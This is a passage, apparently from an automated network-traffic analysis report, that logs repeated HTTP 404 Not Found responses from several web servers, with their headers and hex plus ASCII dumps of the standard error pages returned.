6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:39 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:41 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:44 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:46 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 30 Sep 2024 08:44:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-30T08:44:19.2137950Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92b251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:20 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92a251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:22 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92c251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:24 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92e251b6c5f2a852b091a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:26 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:48 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 